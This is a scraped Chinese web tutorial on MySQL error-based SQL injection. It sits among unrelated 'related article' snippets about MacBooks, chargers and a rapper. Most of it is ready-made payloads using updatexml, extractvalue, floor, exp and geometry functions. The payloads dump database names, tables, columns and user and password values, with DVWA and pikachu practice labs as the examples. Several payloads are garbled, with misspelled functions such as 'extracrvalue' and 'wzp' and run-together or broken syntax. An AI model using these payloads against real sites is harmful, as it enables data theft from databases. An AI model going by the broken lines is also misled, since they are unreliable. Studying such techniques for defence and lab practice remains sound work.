<em>Mac</em>Book项目 2009年学校开始实施<em>Mac</em>Book项目,所有师生配备一本<em>Mac</em>Book,并同步更新了校园无线网络。学校每周进行电脑技术更新,每月发送技术支持资料,极大改变了教学及学习方式。因此2011
2021-06-01 09:32:01
報錯注入的前提是當語句發生錯誤時,錯誤資訊被輸出到前端。其漏洞原因是由於開發人員在開發程式時使用了print_r (),mysql_error(),mysqli_connect_error()函數將mysql錯誤資訊輸出到前端,因此可以通過閉合原先的語句,去執行後面的語句。
updatexml() 是mysql對xml檔案資料進行查詢和修改的xpath函數
extractvalue() 是mysql對xml檔案資料進行查詢的xpath函數
floor() mysql中用來取整的函數
exp() 此函數返回e(自然對數的底)指數X的冪值
updatexml()函數的作用就是改變(查詢並替換)xml檔案中符合條件的節點的值
語法:updatexml(xml_document,XPthstring,new_value)
第一個引數是字串string(XML檔案物件的名稱)
第二個引數是指定字串中的一個位置(Xpath格式的字串)
第三個引數是將要替換成什麼,string格式
Xpath定位必須是有效的,否則則會發生錯誤。我們就能利用這個特性爆出我們想要的資料
註冊就是往資料庫裡新增資料,insert。
在使用者處輸入單引號 報錯
猜測後端語句
insert into user(name,password,sex,phone,address1,address2) value('xxx',123,1,2,3,4)
可以在xxx處對單引號閉合,爆出我們想要的資料
?id=1' or updatexml(0,concat(0x7e,select database()),1)'
閉合單引號使語句逃逸出來,之後重新構造語句查詢,爆破出庫名為:"pikachu"
分析過程
當輸入payload
?id=1' or updatexml(0,concat(0x7e,select database()),1)or'
後端會被拼接為
insert into user(name,password,sex,phone,address1,address2) value('' or updatexml(1,concat(0x7e,database()),0) or '',
表名列名欄位和正常查詢一樣只是換了個位置
利用過程
庫名
1'and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)#
表名
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #
查表資訊(假定有一個users表,庫名為dvwa
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'),0x7e),1) #
查欄位值(假設欄位名為last_name(dvwa.users意思為呼叫dvwa庫的users表)
1' and updatexml(1,concat(0x7e,(select group_concat(first_name,0x7e,last_name) from dvwa.users)),1) #
extractvalue()函數的作用是從目標xml中返回包含所查詢值的字串
extractvalue (XML_document, XPath_string);
第一個引數:XML_document是String格式,為XML檔案物件的名稱,文中為doc
第二個引數:XPath_string(Xpath格式的字串),Xpath定位必須是有效的,否則會發生錯誤
構造payload
?id=1' or extracrvalue(0,concat(0x7e,database())) or '
注意xpath回顯只有一位使用limit函數逐個爆,且最長為32位元,超過32位元爆不了
利用過程
當前庫
1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) #
當前表
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #
表資訊(假設表為users
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) #
欄位值(欄位為user_id,first_name,last_name,(dvwa.users意思為呼叫dvwa庫的users表)
1' and extractvalue(1,concat(0x7e,(select group_concat(user_id,0x7e,first_name,0x3a,last_name) from dvwa.users))) #
floor()是mysql的一個取整函數
庫名
id=1' union select count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by x #
表名(庫為dvwa,通過修改 limit 0,1值遞增查表, limit 1,1、limit 2,1
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(table_name) from information_schema.tables where table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#
欄位名(庫:dvwa,表:users
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#
欄位值(欄位值:user,password(dvwa.users意思為呼叫dvwa庫users表
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from dvwa.users limit 0,1)) x from information_schema.schemata group by x#
當傳遞一個大於709的值時,函數exp()就會引起一個溢位錯誤。
庫名
id=1' or exp(~(SELECT * from(select database())a)) or '
表名(庫名:pikachu
id=1' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema = 'pikachu')a)) or '
欄位名(表名:users
id=1' or exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name = 'users')a)) or '
欄位值(欄位名:password,表名:users
id=1' or wzp(~(select * from(select password from users limit 0,1)a)) or '
1、通過floor報錯,注入語句如下:
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2、通過extractvalue報錯,注入語句如下:
and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3、通過updatexml報錯,注入語句如下:
and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4、通過exp報錯,注入語句如下:
and exp(~(select * from (select user () ) a) );
5、通過join報錯,注入語句如下:
select * from(select * from mysql.user ajoin mysql.user b)c;
6、通過NAME_CONST報錯,注入語句如下:
and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c);
7、通過GeometryCollection()報錯,注入語句如下:
and GeometryCollection(()select *from(select user () )a)b );
8、通過polygon ()報錯,注入語句如下:
and polygon (()select * from(select user ())a)b );
9、通過multipoint ()報錯,注入語句如下:
and multipoint (()select * from(select user() )a)b );
10、通過multlinestring ()報錯,注入語句如下:
and multlinestring (()select * from(selectuser () )a)b );
11、通過multpolygon ()報錯,注入語句如下:
and multpolygon (()select * from(selectuser () )a)b );
12、通過linestring ()報錯,注入語句如下:
and linestring (()select * from(select user() )a)b );
到此這篇關於SQL隱碼攻擊報錯注入函數的文章就介紹到這了,更多相關SQL隱碼攻擊報錯注入函數內容請搜尋it145.com以前的文章或繼續瀏覽下面的相關文章希望大家以後多多支援it145.com!
相關文章
<em>Mac</em>Book项目 2009年学校开始实施<em>Mac</em>Book项目,所有师生配备一本<em>Mac</em>Book,并同步更新了校园无线网络。学校每周进行电脑技术更新,每月发送技术支持资料,极大改变了教学及学习方式。因此2011
2021-06-01 09:32:01
综合看Anker超能充系列的性价比很高,并且与不仅和iPhone12/苹果<em>Mac</em>Book很配,而且适合多设备充电需求的日常使用或差旅场景,不管是安卓还是Switch同样也能用得上它,希望这次分享能给准备购入充电器的小伙伴们有所
2021-06-01 09:31:42
除了L4WUDU与吴亦凡已经多次共事,成为了明面上的厂牌成员,吴亦凡还曾带领20XXCLUB全队参加2020年的一场音乐节,这也是20XXCLUB首次全员合照,王嗣尧Turbo、陈彦希Regi、<em>Mac</em> Ova Seas、林渝植等人全部出场。然而让
2021-06-01 09:31:34
目前应用IPFS的机构:1 谷歌<em>浏览器</em>支持IPFS分布式协议 2 万维网 (历史档案博物馆)数据库 3 火狐<em>浏览器</em>支持 IPFS分布式协议 4 EOS 等数字货币数据存储 5 美国国会图书馆,历史资料永久保存在 IPFS 6 加
2021-06-01 09:31:24
开拓者的车机是兼容苹果和<em>安卓</em>,虽然我不怎么用,但确实兼顾了我家人的很多需求:副驾的门板还配有解锁开关,有的时候老婆开车,下车的时候偶尔会忘记解锁,我在副驾驶可以自己开门:第二排设计很好,不仅配置了一个很大的
2021-06-01 09:30:48
不仅是<em>安卓</em>手机,苹果手机的降价力度也是前所未有了,iPhone12也“跳水价”了,发布价是6799元,如今已经跌至5308元,降价幅度超过1400元,最新定价确认了。iPhone12是苹果首款5G手机,同时也是全球首款5nm芯片的智能机,它
2021-06-01 09:30:45